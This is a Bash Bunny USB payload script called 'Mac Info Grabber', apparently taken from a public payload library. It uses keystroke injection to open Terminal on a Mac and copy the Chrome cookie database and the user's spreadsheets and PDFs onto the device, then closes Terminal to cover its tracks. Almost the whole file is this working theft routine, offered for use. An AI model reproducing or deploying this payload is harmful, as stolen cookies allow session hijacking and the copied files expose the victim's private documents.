bashbunny-payloads/payloads/library/macinfograbber/payload.txt

#!/bin/bash
#
# Title:         Mac Info Grabber
# Author:        kmakblob
# Version:       1.2
#
# Steaks cookies from chrome and documents from the documents folder (spreadsheets)
# then stashes them in /root/udisk/loot/MacLoot
#
# Amber..............Executing payload
# Red................Failed to get spreadsheets
# Purple.............Got some spreadsheets
# Green..............Finished
#

LED G R
ATTACKMODE HID STORAGE

lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \>
/Volumes/BashBunny/$lootdir/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l)

if [ "$files" != "0" -o "$files2" != "0"]; then
  # Got spreadsheet files
  LED R B
else
  LED R
  # No spread sheets
fi